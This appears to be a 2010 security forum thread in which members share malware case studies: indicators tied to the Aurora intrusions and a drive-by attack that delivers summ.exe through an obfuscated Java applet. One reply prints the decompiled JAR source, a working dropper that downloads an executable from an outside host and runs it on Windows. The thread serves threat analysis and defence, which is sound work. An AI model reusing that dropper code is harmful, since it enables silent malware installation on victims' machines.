Author Topic: cyberwart blog : Undetected Malware Case Study: JAN2010-01  (Read 2492 times)

0 Members and 1 Guest are viewing this topic.

January 13, 2010, 07:08:25 pm
Read 2492 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

January 19, 2010, 03:58:14 pm
Reply #1

mwollenweber

  • Newbie

  • Offline
  • *

  • 4

January 19, 2010, 09:13:38 pm
Reply #2

mwollenweber

  • Newbie

  • Offline
  • *

  • 4
The following is related to the Google intrusion set labeled Aurora by McAfee. The hosts listed by Symantec:

yahooo.8866.org
sl1.homelinux.org
360.homeunix.com
li107-40.members.linode.com
ftp2.homeunix.com
update.ourhobby.com

Details check out based on McAfee reports. Most hostnames are set to the local host, but two go to:
61.75.44.42
69.164.192.40

Writeup at:
http://www.cyberwart.com/blog/2010/01/19/idle-speculation-on-auroras/

April 16, 2010, 12:32:12 am
Reply #3

mwollenweber

  • Newbie

  • Offline
  • *

  • 4
http://www.cyberwart.com/blog/2010/04/14/malware-apr2010-01/

<snip>
we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfucscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.
</snip>

April 16, 2010, 05:28:50 am
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
http://www.cyberwart.com/blog/2010/04/14/malware-apr2010-01/

<snip>
we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfucscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.
</snip>

Thank you for your report. It is an example for an exploit of latest Java vulnerability.

http://wepawet.cs.ucsb.edu/view.php?hash=0d51ff98ee18924e1e4d20fbe4248942&t=1271378764&type=js

Source code of JAR
Code: [Select]
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class Main
{
  public static void main(String[] args)
    throws Exception
  {
    String exeurl = "http://buckomre.com/50035/54098876";

    String s = System.getProperty("os.name").toLowerCase();
    if (s.indexOf("win") < 0) {
      return;
    }

    try
    {
      URL url = new URL(exeurl);
      url.openConnection();
      InputStream inputstream = url.openStream();
      String fn = System.getProperty("java.io.tmpdir") + "\\" + Math.pow(Math.random() * 1000.0D, 3.0D) + ".exe";
      FileOutputStream fileoutputstream = new FileOutputStream(fn);

      for (int l = 0; (k = inputstream.read()) != -1; ++l)
      {
        int k;
        fileoutputstream.write(k);
      }
      inputstream.close();
      fileoutputstream.close();
      Runtime.getRuntime().exec(fn);
    }
    catch (Exception fe)
    {
    }
  }
}
Ruining the bad guy's day